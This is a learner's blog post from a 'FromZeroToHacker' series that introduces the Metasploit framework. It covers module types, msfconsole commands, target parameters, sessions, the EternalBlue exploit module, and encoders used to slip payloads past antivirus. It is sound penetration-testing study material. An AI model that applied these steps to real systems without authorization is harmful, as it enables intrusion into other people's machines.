Metasploit is the most widely used exploitation framework that supports all phases of a penetration testing engagement, from information gathering to post-exploitation.
Let’s start our daily #FromZeroToHacker challenge.
| Table of contents |
| Introduction |
| What have I learnt today? |
| Stats |
| Resources |
Introduction to Metasploit Introduction
Metasploit is the most widely used exploitation framework that supports all phases of a penetration testing engagement, from information gathering to post-exploitation.
What have I learnt today?
Introduction to Metasploit
The Metasploit framework is a set of tools that allow information gathering, scanning, exploitation, exploit development, post-exploitation and more. Not only we can do penetration testing, but other things such as vulnerability research and exploit development.
Metasploit has two versions:
- Metasploit Pro: The commercial version that improves the automation and management of tasks. Even it has a Graphical User Interface (GUI).
- Metasploit Framework: The open-source and free version that works from the command line.
The main components of the Metasploit Framework are:
- msfconsole: The main command-line interface.
- Modules: Supporting modules such as exploits, scanners, payloads, etc.
- Tools: Stand-alone tools that will help vulnerability research, vulnerability assessment, or penetration testing.
Let’s start learning the main components of Metasploit.
The main components of Metasploit
Launching it by using the command msfconsole, this console will be our main interface to interact with all the different modules of the Metasploit Framework.
Before starting, a brief reminder of a few concepts:
- Exploit: A piece of code that uses a vulnerability present in the target system.
- Vulnerability: A design, coding or logic flaw affecting the target system.
- Payload: An exploit that takes advantage of a vulnerability. Payloads are the code that will run on the target system.
Let’s see some modules and categories from the Metasploit Framework:
Auxiliary
Any supporting module, such as scanners, crawlers, and fuzzers.
Encoders
Encoders allow you to encode the exploit and payload, hoping that a signature-based antivirus misses them.
As signature-based antivirus and security solutions have a database of known threats, our payloads can get caught instantly. Encoders can improve the success rate by hiding their signature.
Evasion
Instead of encoding, you can also try to evade the antivirus software.
Exploits
Exploits organised by the targeted system.
NOPs
NOPs (No OPeration) do…nothing. Really. They are often used as a buffer to achieve payload sizes.
Payloads
Payloads are codes that will run on the target system to exploit a vulnerability. Getting a shell, loading malware, creating a backdoor to the target system… This and many more are proof of concept of what we can do with payloads.
Running commands on the target system is nice, but having an interactive connection that allows you to type commands (A Shell) is even better. Metasploit offers the ability to send different payloads that can open shells on the target system:
There are four different directories:
- Adapters: An adapter wraps single payloads to convert them into different formats. A Python code turned into a PowerShell adapter, for example.
- Singles: Self-contained payloads (add user, launch notepad.exe, etc) that do not need to download an additional component to run.
- Stagers: Responsible for setting up a connection channel between Metasploit and the target system, while working with staged payloads.
- Stages: Downloaded by the stager, allows you to use larger-sized payloads.
Post
Post modules are useful in the final stage of the penetration testing process, on the post-exploitation process.
Msfconsole
The console will be the main interface when using Metasploit Framework. We can launch it with msfconsole.
The Metasploit console (msfconsole) works just as a regular command-line shell. We can even use commands as ls, clear, history or ping. It also has auto-complete.
One important thing to understand is that Msfconsole is managed by context: All parameter settings are lost if you change the module you are using. For example, once we use use /exploit/windows/smb/ms17_010_eternalblue, the command line prompt changes from msf6 to msf6 exploit(windows/smb/ms17_010_eternalblue.
Now, we have a context set in which we will work. We can see it by typing the show options command:
This will print options related to the exploit we have chosen earlier. Depending on the exploit we have chosen, we will have different options. For example, let’s use show options while using a different exploit:
We can also leave the current module with back:
We can gather more information with the info command:
Search
One of the most useful commands in msfconsole is search. This command search inside the Metasploit Framework database for modules relevant to the search parameter.
This provides a list of modules that we can use, along with columns containing information such as Name, Date, Rank, Description, etc. We can load one module with use <NUMBER>.
Exploits are rated based on their reliability (the Rank column):
Working with modules
Once we have loaded one module with the use command, we need to set parameters, based on the module we will use. We can set them with set <PARAMETER_NAME> <VALUE>.
Let’s use this as an example. RHOSTS, RPORT, VERIFY_ARCH and VERIFY_TARGET options are required. Oftentimes, like with the last 3, are pre-populated, but at least we need to set the RHOSTS value.
Notice that RHOSTS now has a value.
Even if every exploit has different options, we can often see common parameters such as:
- RHOSTS: Remote HOST, the IP address of the target system.
- RPORT: Remote PORT, the port on the target system.
- PAYLOAD: The payload we will use with the exploit.
- LHOST: Local HOST, the attacking machine.
- LPORT: Local PORT, the port we will use for reverse shells on the attacking machine.
- SESSION: Each connection created to the target system using Metasploit will have its own Session ID. We can use this with post-exploitation modules that will connect to the target system using an existing connection.
We can reset all the values (with the exception of the ones with a default option) with the unset all option:
We can set values on a global scale with the setg <PARAMETER_NAME> <VALUE>. Notice the G (Global) after set.
Using modules
Once we have set all the needed values, we can launch the module using the exploit command or run.
Some modules support the check command that will check if the target is vulnerable without running the whole exploit.
Sessions
Once a vulnerability has been exploited, a session will be created. This is a communication channel established between the target and Metasploit. We can use the background command to background the session and go back to the msfconsole prompt. List all the existing sessions with sessions. To interact with any sessions, use the sessions -i <NUMBER> command.
Here is how we can go back and forth with sessions:
Summary
Metasploit is a powerful tool that can help us during the exploitation process. This process has three steps:
- Finding the exploit.
- Customizing the exploit.
- Exploiting the vulnerable service.
Metasploit, as we just saw, provides many modules that we can use for each step of the exploitation process.
Stats
From 78.514th to 77.283th.
Here is also the Skill Matrix:
Resources
Path: Jr Penetration tester
Metasploit
TryHackMe: Metasploit: Introduction
Other resources
Nessus
OWASP Framework top 10 vulnerabilities
Rapid7
Vulnerability Databases
RCE
What the shell?
Staged payloads
Msfconsole cheat sheet
Exploit Ranking
